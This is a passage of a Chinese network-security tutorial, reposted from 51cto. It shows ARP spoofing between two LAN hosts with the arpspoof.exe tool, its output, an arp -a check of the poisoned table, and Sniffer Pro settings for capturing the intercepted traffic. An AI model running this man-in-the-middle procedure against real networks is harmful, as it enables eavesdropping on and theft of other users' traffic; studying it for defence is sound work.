网络通信 频道

Windows交换环境中ARP Sniffer的实现

C:\>arpspoof.exe 192.168.0.1 192.168.0.2 192.168.0.29

ARPSpoof, by netXeyes, Special Thanks BB

www.netXeyes.com 2002, dansnow@21cn.com

Begin Spoof.........

Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29

Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29

Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29

Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29

Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29

Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29

.....................................................

    是时候对192.168.0.1和192.168.0.2的ARP欺骗就开始了,在192.168.0.1上面使用arp -a命令可以看到192.168.0.2和192.168.0.29的MAC地址是一样的。

C:\>arp -a

Interface: 192.168.0.1 on Interface 0x1000004

Internet Address Physical Address Type

192.168.0.2 00-00-86-61-6b-4e dynamic

192.168.0.29 00-00-86-61-6b-4e dynamic

同样在192.168.0.2上面也会发现192.168.0.1和192.168.0.29的MAC地址是一样的。

这样我们就在192.168.0.1和192.168.0.2之间实现了ARP欺骗。

启动Sniffer Pro,在Define Filter里面的Address Type中选择Hardware(注意不要选为通常的类型IP,否则抓不到什么有意义的东西),Station1和Station2选择设置为Any即可。

这时候就开始Sniffer了。

以上结果在我局域网环境中测试通过,不保证适用于所有的环境。

在开发及测试的过程中得到了BB的大力协助,以至于耽误了其看八卦新闻的时间,内疚了很久......:-)

转载地址:http://netsecurity.51cto.com/art/200512/13071.htm

0
相关文章